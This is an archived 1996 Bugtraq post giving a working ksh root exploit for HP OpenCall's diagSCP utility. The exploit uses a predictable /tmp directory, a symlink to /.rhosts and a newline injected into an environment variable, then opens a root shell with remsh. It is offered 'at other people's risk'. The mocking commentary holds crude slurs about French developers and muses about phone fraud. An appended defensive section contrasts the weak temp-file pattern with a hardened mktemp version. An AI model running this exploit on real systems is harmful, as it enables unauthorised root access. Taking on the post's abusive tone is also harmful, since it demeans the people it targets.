Bugtraq mailing list archives
Other Folks Scripts
From: aleph1 () dfw net (Aleph One)
Date: Mon, 9 Dec 1996 02:50:35 -0600
Guest Scriptor: Otto Sync
Exploit: OpenCall platform bug
Shout out: Thanks, Otto, we couldn't have said it better ourselves!

Sure you all see Hewlett Packard as the pure American company, and you blame all these Yankee coders for the bugs that we see here week after week. Big mistake! Stupidity is uniformly distributed. Today we're going to investigate the French arm of HP, located in Grenoble in the Alps, in this division where the most elite products come from: the Telecommunication Network Organisation. Hello to everyone in Grenoble!

Near the mountains are developed products such as their IN (Intelligent Network) platforms, and the OpenCall SCP software is being written by half drunk French skiers who thought HP stands for "Habitation Prolongée" (long term accommodation). No kidding, lay off the alcohol at lunchtime, switch off that Minitel connected to 3615 ANALSEX and think of all those operators put at risk by your dubious programming practices.

Shall we tell you that HP delivers their IN platform with umask 000 as a default and don't see this as a problem ? The idiots! Do you want to know how some of their log files keep being 666 and want to overwrite any of root's files ? Yes, yes, it's true! No, let's deal with something more fancy, the guys at SOD would be disappointed to see such trivial exploits. They have more than one trick up their sleeve, those darned scriptors.

While I'm here as a guest scriptor, one word for HP executives and lawyers. Yes, even those in Grenoble who think they have concentrated all of human intelligence in one place. Make the SOD guys a decent offer, give them some contract work to start with, maybe a nice package with a Maserati company car and one all-year ski pass. Well, all right, it can be a French car, but not a Citroën. Think about all the unreleased bugs ! Think about your children ! Think about endangered species ! Be reasonable, you can surely find them a cosy little spot with a view of Mont Blanc. The survival of humanity is at stake. Let's get back to the bug, if you don't mind.

All right it's not every day that you come across a SCP but remember that most phone network operators have or will have one. And when you know that this gentle high-available system can control every signalling message at various detection points in the call model, you start to wonder. What about creating a special IN service that entitles all your outgoing calls to a 99% charging discount ? Would you have fun rerouting all calls directed at the police station to HP's helpdesk ? Do you finally realize that your slapdash code endangers the stability of the networks it is installed on?

Have a look at the code. It's self-explanatory. Use at other people's risk.

_________________________________________________________________

BUG1: diagSCP

Synopsis
========

The diagSCP utility creates a temporary directory in /tmp with a predictable name. It will also happily follow any evil symlink you put in. The 'env' file created by diagSCP in this directory contains the user's environment and is thus subject to customization. We just have to insert some ^J in a variable to have it go to the next line, so it looks like a valid entry in .rhosts

Exploit
=======

#!/bin/ksh
FILE=/.rhosts
NEXT=`expr $$ + 5`
mkdir /tmp/diagSCP.$NEXT
ln -s $FILE /tmp/diagSCP.$NEXT/env
export GUESSWHAT="
localhost `whoami`"
diagSCP &
sleep 2
kill $NEXT
echo "\nFrench kiss ? root kiss !\n"
remsh localhost -l root ksh -i

Aleph One / aleph1 () dfw net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
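The two flaws named in the synopsis (a predictable /tmp/diagSCP.<pid> directory and a write that follows whatever already sits at .../env), shown beside a hardened form. This is an added example, not part of the original post and not HP's diagSCP code; the function names and the scratch-directory scenario are assumptions, and the weak function only models the behaviour the post describes.

```shell
#!/bin/sh
# Added example, not HP's diagSCP source. Function names are hypothetical.

# Weak pattern from the advisory: predictable name, pre-existing directory
# accepted, and the redirect follows whatever is already at .../env.
dump_env_weak() {                      # $1 = base directory (stands in for /tmp)
    dir="$1/diagSCP.$$"
    mkdir -p "$dir"
    env > "$dir/env"
    echo "$dir"
}

# Hardened pattern: private umask, directory created atomically under a random
# name by mktemp, and noclobber so the redirect refuses an existing regular file.
dump_env_safe() {                      # $1 = base directory
    (
        umask 077
        dir=$(mktemp -d "$1/diag.XXXXXXXXXX") || exit 1
        set -C
        env > "$dir/env" || exit 1
        echo "$dir"
    )
}

# Constructed scenario in a scratch directory: a link planted at the
# predictable path redirects the weak writer but not the hardened one.
demo() {
    base=$(mktemp -d) || return 1
    echo original > "$base/victim"
    mkdir "$base/diagSCP.$$"
    ln -s "$base/victim" "$base/diagSCP.$$/env"
    dump_env_weak "$base" > /dev/null
    weak=$(head -n 1 "$base/victim")
    echo original > "$base/victim"
    safe_dir=$(dump_env_safe "$base") || return 1
    safe=$(head -n 1 "$base/victim")
    echo "weak writer left victim starting with: $weak"
    echo "safe writer left victim starting with: $safe (wrote to $safe_dir)"
    rm -rf "$base"
}
demo
```

The hardened writer's real protection is the mode-0700 directory that mktemp creates under a name nobody could pre-plant; noclobber is a second layer. With the umask 000 default the post mentions, the 077 umask set inside the function is what keeps the env dump private.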